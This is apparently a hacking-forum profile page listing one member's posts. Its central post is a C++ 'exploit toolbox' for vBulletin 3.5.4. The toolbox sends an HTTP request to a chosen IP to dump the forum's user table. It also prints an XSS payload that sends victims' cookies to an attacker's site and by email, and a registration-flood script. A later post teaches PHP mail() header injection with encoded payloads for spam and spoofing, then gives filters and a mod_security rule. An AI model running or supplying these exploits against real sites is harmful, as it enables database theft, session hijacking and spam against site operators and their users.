M4k3

Members
  • Content count

    32

Community Reputation

-1 Noobie

About M4k3

  • Rank
    H4x0r

Contact Methods

  • AIM
    mika2pl
  • Website URL
    http://www.pldsoft.com

Profile Information

  • Interests
    PHP, MySQL, C, C++, Perl and Python
  1. Well, the new Version released: 69...challenges in the following topics.. -Javascript -Programming -Cryptology -Steganography -PHP -Realistic -Visual Basic -Cracking just check it out... Hackit and Challenge System
  2. Hello mates, Today PLDsecurity opened the Web Security Challenge System, with currently 36 challenges in Js, VB, Crypto and Realistic, check it out and have fun. More Challenges will be added soon. www.pldsecurity.de/forum/challenges.php Regards, Michael
  3. #include <unistd.h> #include <stdio.h> #include <stdlib.h> #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> #include <netdb.h> #include <arpa/inet.h> #include <errno.h> #include <string.h> #include <iostream> using namespace std; string exploit; string answer; string answer2; long s; sockaddr_in addr; char IPaddr[1024]; /*You have to change to the right path*/ char sget[] = "GET /install/upgrade_300b3.php?step=backup&do=sqltable&table=user HTTP/1.0\r\nConnection: Close\r\n\r\n"; char stry[41943040]; long I; long M, J, K, L; int i; int main() { cout << "> Welcome to vbulletin 3.5.4 Exploit-Toolbox v.0.1.1" << endl; cout << "> Here you can find all released vbullein 3.5.4 exploits" << endl; cout << "> Press 1 for Install_path exploit" << endl; cout << "> Press 2 for Xss vbulletin 3.5.x (test: 3.5.4)" << endl; cout << "> Press 3 for vBulletin 3.5.4 Flood Exploit" << endl; cout << "> Programm Author M4k3, www.pldsoft.com" << endl; cout << "> Copyright by PLDsoft.com" << endl; cout << "> Number? 
"; cin >> exploit; cout << endl; if (exploit == "1") { cout << " ____________________ " << endl; cout << " |---PLDsoft.com------|" << endl; cout << " |--------------------|" << endl; cout << " |-vbulletin 3.5.4---|" << endl; cout << " |install_path exploit|" << endl; cout << " |____________________|" << endl; cout << "##############################################" << endl; cout << "vBulltin 3.5.4 exploit.....install path is open or not secure" << endl; cout << "###############################################" << endl; cout << endl; cout << "Discovered By M4k3 PLDsoft Security Team, www.pldsoft.com" << endl; cout << "Remote : Yes" << endl; cout << "Critical Level : Dangerous"<< endl; cout << "############################################" << endl; cout << "Affected software description :" << endl; cout << endl; cout << "Application : vbulletin" << endl; cout << "version : latest version [ 3.60 Release 4 ]" << endl; cout << "URL : http://www.vbulletin.com" << endl; cout << endl; cout << "########################################" << endl; cout << "Exploit:" << endl; cout << endl; cout << "www.vicitimsite.com/forumpath/install/upgrade.php?step=[writehereanylettersbutnotnumbers!]" << endl; cout << endl; cout << "when it works, you can download the database..." << endl; cout << endl; cout << "########################################" << endl; cout << "Contact:" << endl; cout << "Nick: M4k3" << endl; cout << "E-mail: m4k3@pldsoft.com" << endl; cout << "Website: http://www.pldsoft.com" << endl; cout << "_______End of Exploit______" << endl; cout << endl; sleep(1); cout << "Use the exploit now?" 
<< endl; cout << "yes/no: "; cin >> answer; } if (answer == "yes") { cout << "Starting vbulletin 3.5.4 install_path exploit" << endl; { cout << "Insert IP: "; cin >> IPaddr; M = 0; J = 0; K = 0; L = 0; while(IPaddr[i] != 0) { if(IPaddr[i] >= '0' && IPaddr[i] <= '9') { L *= 10; L += IPaddr[i] - '0'; K++; if(K > 3) { M = -1; break; } } else if(IPaddr[i] == '.') { if(K == 0) { M = -1; break; } if(L >= 255) { M = -1; break; } J++; K = 0; L = 0; } else { M = -1; break; } M++; } if(M == -1 || J != 3) { cout << "> Invalid IP-Address!" << endl; return 0; } s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); addr.sin_family = AF_INET; inet_aton(IPaddr, &addr.sin_addr); addr.sin_port = htons(80); if(connect(s, (sockaddr*) &addr, sizeof(sockaddr_in))) { printf("Failure: Connection Rested!\r\n"); close(s); return 1; } if(send(s, sget, strlen(sget), 0) == 0) { printf("Failure: Not able to send packets!\r\n"); close(s); return 2; } if((I = recv(s, stry, 41943040, 0)) == 0) { printf("Failure: Not able to receive packets!\r\n"); close(s); return 3; return 0; } close(s); printf("Packets received succesfully!\r\nBytes of received Data: %d\r\n", I); printf("%s", stry); return 0; } } else if (exploit == "2") { cout << "=> Xss Vbulletin 3.5.x ( test: 3.5.4 )"<< endl; cout << "=> Author: SpiderZ"<< endl; cout << "=> Sito: www.spiderz.tk"<< endl; cout << endl; cout << "_____________________________________________________________"<< endl; cout << endl; cout << "( 1 )"<< endl; cout << endl; cout << "<?php"<< endl; cout << "$ip_adresse = $_SERVER['REMOTE_ADDR']; "<< endl; cout << "if(!empty($ip_adresse)) "<< endl; cout << "{ "<< endl; cout << "echo 'il tuo ip ?: ',$ip_adresse; "<< endl; cout << "} "<< endl; cout << "else "<< endl; cout << "{ "<< endl; cout << "echo 'Impossible d\'afficher l\'IP'; "<< endl; cout << "} "<< endl; cout << "?> "<< endl; cout << endl; cout << "<a href=""log.php""></a><?"<< endl; cout << "$xx1=$HTTP_SERVER_VARS['SERVER_PORT'];"<< endl; cout << "$day = 
date(""d"",time()); $month = date(""m"",time()); $year = date(""Y"",time());"<< endl; cout << "if ($REMOTE_HOST == "") $visitor_info = $REMOTE_ADDR;"<< endl; cout << "else $visitor_info = $REMOTE_HOST;"<< endl; cout << "$base = 'http://' . $HTTP_SERVER_VARS['SERVER_NAME'] . $PHP_SELF;"<< endl; cout << "$x1=`host $REMOTE_ADDR|grep Name`;"<< endl; cout << "$x2=$REMOTE_PORT;"<< endl; cout << "?>"<< endl; cout << endl; cout << "<?php"<< endl; cout << "$cookie = $_GET['c'];"<< endl; cout << "?>"<< endl; cout << endl; cout << "<?php"<< endl; cout << "$myemail = ""YOUR ADDRESS E-MAIL"";"<< endl; cout << "$today = date(""l, F j, Y, g:i a"");"<< endl; cout << "$subject = ""Xss Vbulletin"";"<< endl; cout << "$message = ""Xss: Hacking"""<< endl; cout << "Ip: $ip_adresse "<< endl; cout << "Cookie: $cookie"<< endl; cout << "Url: $base"<< endl; cout << "porta usata: $xx1"<< endl; cout << "remote port: $x2"<< endl; cout << "Giorno & Ora : $today \n"<< endl; cout << endl; cout << "$from = ""From: $myemail\r\n"";"<< endl; cout << "mail($myemail, $subject, $message, $from);"<< endl; cout << "?>"<< endl; cout << endl; cout << "--------------------------------------------------------------------"<< endl; cout << endl; cout << "<?php"<< endl; cout << "$myemail = ""YOUR ADDRESS E-MAIL"";"<< endl; cout << endl; cout << "--------------------------------------------------------------------"<< endl; cout << endl; cout << "( 2 )"<< endl; cout << endl; cout << "--------------------------------------------------------------------"<< endl; cout << endl; cout << "Name file: image.gif"<< endl; cout << endl; cout << "--------------------------------------------------------------------"<< endl; cout << endl; cout << endl; cout << "<pre a='>' onmouseover='document.location=""http://YOUR ADDRESS WEB.com/exploit.php?"" "<< endl; cout << "c=""+document.cookie' b='</pre' >"""<< endl; cout << endl; cout << endl; cout << "--------------------------------------------------------------------"<< endl; cout 
<< endl; cout << "location=""http://YOUR ADDRESS WEB.com"""<< endl; cout << endl; cout << "--------------------------------------------------------------------"<< endl; cout << endl; cout << endl; cout << "( 3 )"<< endl; cout << endl; cout << "--------------------------------------------------------------------"<< endl; cout << endl; cout << "Like Using"<< endl; cout << "--------------------------------------------------------------------"<< endl; cout << endl; cout << "1 new thread"<< endl; cout << "2 <a href=""http://YOUR ADDRESS WEB.com/IMAGE.GIF"" target=""_blank"">BEAUTIFUL GIRL</a>'"<< endl; cout << "3 Submit"<< endl; cout << "4 It waits for"<< endl; cout << endl; cout << "--------------------------------------------------------------------"<< endl; cout << endl; cout << endl; cout << "# www.spiderz.tk " << endl; cout << endl; cout << "_______End of Exploit______" << endl; } else if (exploit == "3") { cout << "Script : vBulletin Version 3.5.4" << endl; cout << endl; cout << "site : www.vbulletin.com" << endl; cout << endl; cout << "Exploit by : x-boy" << endl; cout << endl; cout << "E-mail : Dicomdk (at) gmail (dot) com [email concealed]" << endl; cout << endl; cout << "Type : Registration flood in register.php" << endl; cout << endl; cout << "Thanks to : Simo64" << endl; cout << endl; cout << endl; cout << "Code of exploit (For english version , you can change it to other language)=> exploit.php" << endl; cout << endl; cout << "cURL Must be activated (http://curl.haxx.se)" << endl; cout << endl; cout << "Sorry for my bad English :-)" << endl; cout << endl; cout << endl; cout << "<?" 
<< endl; cout << endl; cout << "set_time_limit(60);" << endl; cout << endl; cout << "//You can change 10 to other numbers" << endl; cout << endl; cout << "for($i = 1; $i <= 10; $i++)" << endl; cout << endl; cout << "{" << endl; cout << endl; cout << "//to put curl to send POST request" << endl; cout << endl; cout << "$ch = curl_init();" << endl; cout << endl; cout << "//change http://localhost/vb3 to the url of the script" << endl; cout << endl; cout << "curl_setopt($ch , CURLOPT_URL , 'http://localhost/vb3/register.php');" << endl; cout << endl; cout << "curl_setopt($ch , CURLOPT_POST , 1);" << endl; cout << endl; cout << "curl_setopt($ch , CURLOPT_POSTFIELDS ," << endl; cout << "'agree=1&s=&do=addmember&url=index.php&password_md5=&passwordconfirm_md5" << endl; cout << "=&day=0&month=0&year=0&username=x-boy'.$i.'&password=elmehdi&password" << endl; cout << "con" << endl; cout << "firm=elmehdi&email=dicomdk'.$i.'@gmail.com&emailconfirm=dicomdk'.$i.'@gm" << endl; cout << "ail.com&referrername=&timezoneoffset=(GMT -12:00) Eniwetok, Kwajalein&dst=DST" << endl; cout << "corrections always on&options[showemail]=1');" << endl; cout << endl; cout << "curl_exec($ch);" << endl; cout << endl; cout << "curl_close($ch);" << endl; cout << endl; cout << "}" << endl; cout << endl; cout << "//Flood finished good luck" << endl; cout << endl; cout << "?>" << endl; cout << endl; cout << "____End of Exploit___" << endl; } else { cout << "File not found / Failed to open file" << endl; } cout << endl; cout << endl; cout << endl; cout << "Copyright and Programming by PLDsoft.com, [Author M4k3]" << endl; cout << "Contact m4k3@pldsecurity[dot]de" << endl; return 0; } This ExploitBox Insert the 3 relesed vbulletin exploits. 1.) Install_path exploit 2.) Xss vbulletin 3.5.x (test: 3.5.4) 3.) vBulletin 3.5.4 Flood Exploit The vbulletin Install_path exploit, is useable in this code the other two exploits can only be watched.
  4. New Links released: http://www.pldsecurity.de/index.php?option...1&Itemid=70
  5. Video get reuploaded.....on pldsoft.com.
  6. Hello mates, Find SQL Passwords, Mails and other private things....take a look on this video..... http://www.pldsecurity.de/index.php?option...1&Itemid=70 you find the video on the footer of the page.... enjoy it....
  7. I'm still searching for where I uploaded the video... sorry guys... if I don't find it I will make a new one.
  8. So tell me Sean....you will host now videos or not? Regards, Michael
  9. If you are interested in anonymous email accounts, you may be interested in something like this:

     Related Topics
     Category:Injection_Attacks

     There are a lot of ways to send anonymous emails, some use it to mass mail, some use it to spoof identity, and some (a few) use it to send email anonymously. Usually a web mailform using the mail() function generates emails containing headers with the originating IP of the server it's running on. Therefore the mailform acts as a SMTP proxy. The input fields of the form may vary, but it is common to specify a mailform that gives you control over the subject, the message, and the sender's email address.

     Function usage : mail([RECIPIENT],[SUBJECT],[MESSAGE],[EXTRAHEADERS], [EXTRAPARAMS]); (mail() (http://www.php.net/function.mail))

     Extra params are not commonly fed from user input, so we'll skip this part. Since most webmasters carefully hardcode the recipient's email address into the contact form of their web application, one might think this sets a limit to the way this kind of script can be exploited (but one is wrong!)..

     Here's an example of code we'll base our analysis on :

         <?php
         $to="webmaster@website.com";
         if (!isset($_POST["send"])){
             // no post data -> display form
             ?>
             <form method="POST" action="<?=$_SERVER['PHP_SELF'];?>">
             To: webmaster@website.com
             From: <input type="text" name="sender">
             Subject : <input type="text" name="subject">
             Message :
             <textarea name="message" rows="10" cols="60" lines="20"></textarea>
             <input type="submit" name="send" value="Send">
             </form>
             <?php
         }else{
             // found post data .. deal with it
             // (vulnerable on purpose: $from goes into the headers unfiltered)
             $from=$_POST['sender'];
             // send mail :
             if (mail($to,$_POST['subject'],$_POST['message'],"From: $from\n")){
                 // display confirmation message if mail sent successfully
                 echo "Your mail was indeed sent to $to.";
             }else{
                 // sending failed, display error message
                 echo "Doh! Your mail could not be sent.";
             }
         }
         ?>

     When looking at the html form or at the code it seems obvious one cannot choose the recipient email address as it is hardcoded in the script. However it is possible to choose the subject, the message, and the sender email address (From: header). Using php mail() function roughly works as follows:

         <?php mail($recipient,$subject,$message,$headers); ?>

     .. and will produce a raw output :

         To: $recipient
         Subject: $subject
         $headers

         $message

     Thus when calling the function as follows :

         <?php mail("recipient@victim.xxx","Hello","Hi,\nYour site is great.\nBye","From: sender@anonymous.xxx\n"); ?>

     .. the raw output data looks like this :

         To: recipient@victim.xxx
         Subject: Hello
         From: sender@anonymous.xxx

         Hi,
         Your site is great.
         Bye

     The php code for the mailform provided earlier shows that the most interesting part the user can choose to feed in the form is the sender email address, because it is directly displayed inside the headers. In this example it is possible to modify or add other headers than the 'From:' using this form. Of course the 'message', 'To' and 'Subject' fields could also be used to inject some data but the mail() function and the RFC specifications would filter any content given to those fields to prevent it from being abused.

     What's the point of injecting email headers ?

     In this context, the target is to be able to send anonymous emails to other recipients. There are numerous additional fields that can be specified in the mail headers (see [RFC 822]). For example the 'Cc' (Carbon Copy), which sends a copy of the message to the email addresses given as arguments. A better choice is to use the 'Bcc' (Blind Carbon Copy) which sends a carbon copy of the message just like with the 'Cc' header, except that the recipients' email addresses given as arguments are not shown to the multiple recipients' headers. As specified in the [RFC 822], one must add a line feed for every header.
     The <LF> (line feed) char has a hexadecimal value of 0x0A. Thus by providing the following values to the example script of this article :

       - Sender : "sender@anonymous.www%0ACc:recipient@someothersite.xxx%0ABcc:somebloke@grrrr.xxx,someotherbloke@oooops.xxx"
       - Subject : "ahem"
       - Message : "My Message..."

     The email's raw data will look like this :

         To: recipient@victim.xxx
         Subject: ahem
         From: sender@anonymous.xxx
         Cc:recipient@someothersite.xxx
         Bcc:somebloke@grrrr.xxx,someotherbloke@oooops.xxx

         My Message...

     ... mail headers injected successfully ! Despite the fact that the only header value the html form allows to specify is the 'From', the resulting email has been sent to three people of our choice : recipient@someothersite.xxx, somebloke@grrrr.xxx and someotherbloke@oooops.xxx

     In the last example, both 'Cc' and 'Bcc' headers have been used to perform the injection. It would also have been possible to use the 'To' header, the last value is added (just like in the "Cc" and "Bcc" fields) to the hardcoded email address of the webmaster. Let's keep the same value for subject and message, and give the following value to the sender :

         email@anonymous.xxx%0ATo:email1@who.xxx

     the mail output is :

         To: recipient@victim.xxx
         Subject: Hum
         From: email@anonymous.xxx
         To:email1@who.xxx

         My Message...

     Repeating the 'To' header won't be a problem, the mail will be sent to recipient@victim.xxx AND email1@who.xxx.
     Now let's consider a more restrictive purpose to send anonymous emails : spamming

     Many sites provide the possibility to "email this page to a friend" through a web form, the resulting email softly suggests to "visit our website" on behalf of the user that filled in the form with his personal email address, and the email address of the friend he wants the page to be emailed to :

         <?php
         $subject="Visit our site www.website.xxx !";
         $message="Hello,\nA friend thought you might want to see this page : www.website.xxx.\nBye Bye.";
         if (!isset($_POST["send"])){
             // no post data, display form
             ?>
             <form method="POST" action="<?=$_SERVER['PHP_SELF'];?>">
             A : <input type="text" name="recipient">
             De: <input type="text" name="sender">
             <input type="submit" name="send" value="Send">
             </form>
             <?php
         }else{
             // found post data
             // (vulnerable on purpose: $from goes into the headers unfiltered)
             $from=$_POST['sender'];
             $to=$_POST['recipient'];
             // send mail :
             if (mail($to,$subject,$message,"From: $from\n")){
                 // success
                 echo "Mail sent successfully to $to.";
             }else{
                 // failure
                 echo "Doh ! Sending failed.";
             }
         }
         ?>

     Even though the subject and the message are hardcoded, there is still a way to inject headers (we already know how to add recipients). As covered earlier in this article, we saw that the 'To' header can be sent twice, the 'Subject' header is not an exception to this rule, and so it is for numerous other headers... By providing a recipient address buddy@pal.xxx and a sender address

         misterburns@springfield.xxx%0ASubject:My%20Anonymous%20Subject

     the email body will look like this :

         To: buddy@pal.xxx
         Subject: Visit our site www.website.xxx !
         From: misterburns@springfield.xxx
         Subject: My Anonymous Subject

         Hello,
         A friend thought you might want to see this page : www.website.xxx.
         Bye Bye

     The subject "My Anonymous Subject" will be added to "Visit our site www.website.xxx !", and in some cases will replace it (depending on the mail services, smtp relays, mail client, etc). For example hotmail displays the added subject inside the message.
     Let's see now how to alter the message body. The difference between the body and the headers is that the body cannot be identified by its name (From, To, etc); there is no such 'Message' header existing in the [RFC 822]. And that's exactly how we will alter this part of the mail, a <LF> with no header name means that the message body started. So instead of specifying a <LF> and a header name, we will just add a <LF> and give our message. As both 'To' and 'Subject' headers are already defined, the resulting output will contain both the older message and the injected message, except that instead of being appended, it will be prepended. Say we provide this sender :

         badguy@badboys.com%0A%0AMy%20New%20%0AAnonymous%20Message.

     then the email will look like this :

         To: buddy@pal.xxx
         Subject: Visit our site www.website.xxx !
         From: badguy@badboys.com

         My New
         Anonymous Message.

         Hello,
         A friend thought you might want to see this page : www.website.xxx.
         Bye Bye

     we can clearly see that the new message :

         My New Anonymous Message

     is prepended to the old message :

         Hello, A friend thought you might want to see this page : www.website.xxx. Bye Bye

     to finally give this message

         My New Anonymous Message Hello, A friend thought you might want to see this page : www.website.xxx. Bye Bye

     There are more headers than "Cc", "Bcc","To","Subject" and "From" but this article will not cover all of them as they are not especially helpful for this article. However the "Content-Type" header can be very useful : this header has a default value set as "plain/text". It is possible to re-define this header as "text/html", and then provide some html content to the message by giving this value to the sender's email address :

         haxor@attack.com%0AContent-Type:text/html%0A%0AMy%20%New%0AHTML%20Anonymous%20Message.%0A

     the email sent will look like :

         To: buddy@pal.xxx
         Subject: Visit our site www.website.xxx !
         From: haxor@attack.com
         Content-Type:text/html

         My New
         HTML Anonymous Message.

         Hello,
         A friend thought you might want to see this page : www.website.xxx.
         Bye Bye

     when displayed, this email will have the text "HTML Anonymous Message." underlined.

     The mail() function respects the MIME (http://www.mhonarc.org/~ehood/MIME/) encoding. By knowing this, the header "Content-Type" can be used in different ways for injection purposes. The MIME (http://www.mhonarc.org/~ehood/MIME/) encoding (Multipurpose Internet Mail Extensions) can be used - in addition to send html mails - to attach files (sound, image, txt, etc). The fact is that the header "Content-Type" can be re-defined as "multipart/mixed" (or "multipart/alternative" or "multipart/related"), even though it was already defined previously. The injection possibility for this header is that the "multipart/mixed" can help us to separate the mail in several parts. Here's an example in MIME (http://www.mhonarc.org/~ehood/MIME/) format, with one recipient part :

         To: recip@ient.xxx
         Subject: Good Luck
         From: sender@spoofed.xxx
         Content-Type: multipart/mixed; boundary="MyBoundary";

         Hidden Text1
         --MyBoundary
         Content-Type: plain/text;

         Good Luck for you work,
         bye
         --MyBoundary--
         Hidden Text2

     First we see the header "To", "Subject" and "From" then the "Content-Type" defined as "multipart/mixed", then the "boundary" line whose value is "MyBoundary". This boundary stuff is used as a separator (see [RFC 822] for detailed info) inside the message. It is also used to set the beginning/end of the first/last part ( "--[THE BOUNDARY]" ). Note : "[THE BOUNDARY]" can be replaced by any (US/ASCII [:alnum:]) value.

     Then we see a line "Hidden Text1". This text will not be visible to the recipient, because it is located before the first "boundary" declaration. Then we see the "--MyBoundary" line, announcing the beginning of the first message, and then, just after the "Content-Type" header (which will define the content type of this specific message part), some simple text.
     Then we see the message, and the line "--MyBoundary--", announcing the end of the email, and consequently having the last part "Hidden Text2" hidden to most web clients. Now the originating message and subject, both hardcoded in php, are ignored. So by providing the following value to the sender :

         haxor@attack.com%0AContent-Type:multipart/mixed;%20boundary=frog;%0A--frog%0AContent-Type:text/html%0A%0AMy%20Message.%0A--frog--

     we get :

         To: recip@ient.xxx
         Subject: Visit www.website.xxx !
         From: haxor@attack.xxx
         Content-Type:multipart/mixed; boundary=frog;
         --frog
         Content-Type:text/html

         My Message.
         --frog--

         Hello,
         A friend thought you might want to see this page : www.website.xxx.
         Bye Bye

     and the message received by "recip@ient.xxx" is a HTML message containing "My Message." ("My Message." in Bold). The advertisement message (hardcoded) :

         Hello, A friend thought you might want to see this page : www.website.xxx. Bye Bye

     .... is NOT displayed. Note : boundary is sent with no quotes this time, just to show it applies even if magic_quotes_gpc=ON.

     This method is applicable in different context. Imagine a script where 'sender' can be specified and where some other field (like first name, last name, age, etc) is echoed in the message body once the form is submitted. In that case it is possible to get the same results (choose exactly what message the recipient will see) by providing the following value to the 'sender' header :

         haxor@attack.com%0AContent-Type:multipart/mixed;%20boundary=frog;%0A

     and to the optional field (e.g nickname) :

         %0A--frog%0AContent-Type:text/html%0A%0AMy%20Message.%0A--frog--

     the mail will look like :

         To: ami@friends.xxx
         Subject: Visit www.website.xxx !
         From: haxor@attack.xxx
         Content-Type:multipart/mixed; boundary=frog;

         Hello,
         A friend called
         --frog
         Content-Type:text/html

         My Message.
         --frog--
         thought you might want to see this page : www.website.xxx.
         Bye Bye

     As you can see, the hardcoded message has been split in two.
     The value of the optional field (nickname) has been replaced by the injected message, and whatever is after the inserted text will NOT be shown in the mail client.

     Now a last example, compiling all possibilities seen in this article, and more... just give this value to the sender :

         haxor@attack.xxx%0ASubject:Ooops%0ABcc:target@nothappy.xxx%0AContent-Type:multipart/mixed;%20boundary=frog;%0A--frog%0AContent-Type:text/html%0A%0AHTML%20Message.%0A%0A--frog%0AContent-Type:text/html;name=Nastycode.html;%0AContent-Transfer-Encoding:8bit%0AContent-Disposition:attachment%0A%0AHTML%20File%0A%0A--frog--%0A

     email is sent as follows :

         To: pal@friends.xxx
         Subject: Visit www.website.xxx !
         From: haxor@attack.xxx
         Subject:Mwahahaha
         Bcc:target@nothappy.xxx
         Content-Type:multipart/mixed; boundary=frog;
         --frog
         Content-Type:text/html

         HTML Message.

         --frog--
         Content-Type:text/html;name=Nastycode.html;
         Content-Transfer-Encoding:8bit
         Content-Disposition: attachment

         HTML File

         --frog--

         Hello,
         A friend thought you might want to see this page : www.website.xxx.
         Bye Bye

     So the sender is : "haxor@attack.xxx", the subject is : "Visit www.website.xxx ! Oooops". This email will be received by "pal@friends.xxx", and a carbon copy will be sent to "target@nothappy.xxx". The email content will be HTML : HTML Message. a file named "Nastycode.html" with content type "text/html" will be attached to the email : HTML File

     [panic]Okay, the problem has been described, now is a good time to panic... [/panic]

     There are several ways to secure a script vulnerable to such injection attacks. First rule would be to filter user data, using regular expressions or string functions :

         <?php
         $from=$_POST["sender"];
         // preg_match() replaces eregi(), which was removed in PHP 7
         if (preg_match('/[\r\n]/',$from)){
             die("Why ?? ");
         }
         ?>

     more regexps here (http://www.regexlib.com/Search.aspx?k=email)

     We can see in the previous script that any occurrence of "\r" or "\n" will make it die(). "\n" is equal to <LF> (Line Feed or 0x0A/%0A in hexadecimal), and "\r" is equal to <CR> (Carriage return or 0x0D/%0D in hexadecimal). Some chars like %0A%0D can be used as a substitute to %0A, but it is always the last char that is really dangerous.

     mod_security (http://www.modsecurity.org/) is also a good chunk of software (http://www.onlamp.com/pub/a/apache/2..._security.html) that can put a stop to Bcc injection on the server level. With modsecurity it is possible to scan the POST or GET body for bcc:, cc:, or to: and reject any request that contains those letters. To protect against mail injection, add the below rule to your modsecurity setup.

         SecFilterSelective ARGS_VALUES ".*([Cc][Cc]|[Bb][Cc][Cc]|[Tt][Oo])[[:space:]]*\:.*\@"

     gotroot.com (http://gotroot.com/tiki-index.php?pa...f+mod_security) is a great source for modsecurity rules. It is a good idea to use their rules and configuration to protect users against other php exploits. Any virtual host having issues with modsecurity can have it disabled by adding the below setting to the VirtualHost container:

         <IfModule mod_security.c>
         SecFilterEngine Off
         </IfModule>

     Two points to remember when watching injections :

       - Any existing data located *after* the injection point can be replaced.
       - Any data to be added will always be located *after* the injection point (ex : "From").

     There is another good point to this security measure despite the fact that subject and recipient values passed to the mail() function are cleaned : when using Emacs, the "Fcc" header is also protected from injections. This "Fcc" field contains the name of one file and directs Emacs (http://www.gnu.org/software/emacs/ma...l-Headers.html) to append a copy of the message to that file when you send the message. Although this works on Emacs (http://www.gnu.org/software/emacs/ma...-Headers.html), it is not possible with the PHP mail() function.
     Other exploit possibilities related to the MIME vulnerabilities (http://groups.google.com/groups?q=mime+vulnerabilities) are not developed in this article.
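
A hardened version of the "email this page to a friend" handler from post 9, added here as an example; it is not code from the post or from the article it quotes. The function names and the `$mailer` callable (a stand-in for mail() so the block runs offline) are assumptions, and the sample inputs are constructed from the payload shapes shown in the post.

```php
<?php
declare(strict_types=1);

// Added example (not from the original post). Function names are hypothetical.

/** True when a value carries a raw CR/LF or a still-encoded %0A / %0D. */
function has_header_break(string $value): bool
{
    // $_POST is already URL-decoded, so %0A normally arrives as "\n";
    // the literal %0A/%0D check covers values that were double-encoded upstream.
    return preg_match('/[\r\n]|%0[ad]/i', $value) === 1;
}

/** Return exactly one syntactically valid address, or null. */
function clean_address(string $value): ?string
{
    if (has_header_break($value)) {
        return null;
    }
    $addr = filter_var(trim($value), FILTER_VALIDATE_EMAIL);
    return $addr === false ? null : $addr;
}

/**
 * Hardened form of the second mail form in the post: subject and body are
 * hardcoded, sender and recipient are user input. $mailer stands in for
 * mail() (assumption, for offline runs); pass 'mail' to send for real.
 */
function send_page_to_friend(string $sender, string $recipient, callable $mailer): bool
{
    $from = clean_address($sender);
    $to   = clean_address($recipient);
    if ($from === null || $to === null) {
        return false; // refuse rather than try to repair hostile input
    }
    $subject = 'Visit our site www.website.xxx !';
    $message = "Hello,\nA friend thought you might want to see this page : www.website.xxx.\nBye Bye.";
    return (bool) $mailer($to, $subject, $message, "From: $from");
}

// Stand-in mailer: records each message in the raw layout the post describes.
$outbox = [];
$recorder = function (string $to, string $subject, string $message, string $headers) use (&$outbox): bool {
    $outbox[] = "To: $to\nSubject: $subject\n$headers\n\n$message";
    return true;
};

// Constructed sender values, URL-encoded as a browser would submit them.
$senders = [
    'plain address'     => 'misterburns@springfield.xxx',
    'added Bcc'         => 'sender@anonymous.xxx%0ABcc:somebloke@grrrr.xxx',
    'second Subject'    => 'misterburns@springfield.xxx%0ASubject:My%20Anonymous%20Subject',
    'body prepend'      => 'badguy@badboys.com%0A%0AMy%20New%20Message.',
    'CRLF variant'      => 'sender@anonymous.xxx%0D%0ACc:recipient@someothersite.xxx',
    'several addresses' => 'a@one.xxx,b@two.xxx',
];

foreach ($senders as $label => $encoded) {
    $sender = urldecode($encoded); // PHP does this itself when it fills $_POST
    $ok = send_page_to_friend($sender, 'buddy@pal.xxx', $recorder);
    printf("%-18s %s\n", $label, $ok ? 'sent' : 'rejected');
}

echo "\nMessages handed to the mailer: ", count($outbox), "\n", $outbox[0], "\n";
```

Because the sender is the only user input that reaches the header block here, rejecting line breaks in it also stops the Content-Type and boundary injections described in the post, which depend on first adding a header.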
  10. i have found it.....cause i was trying some code..... download link: http://www.zack6924-underground.net/forum/...pldsoft.com.rar
  11. The internet is full of idiots' sites.
  12. Well, it is java. I will take a look and i will run it.
  13. Nice man. Good work.
  14. Then you have to create a forum... for people who have more knowledge than others.
  15. Well, you have try it on nulled version. I will make a new exploits who will break down the number code what you have enter. The Forums are now protected....because i have warn the admins...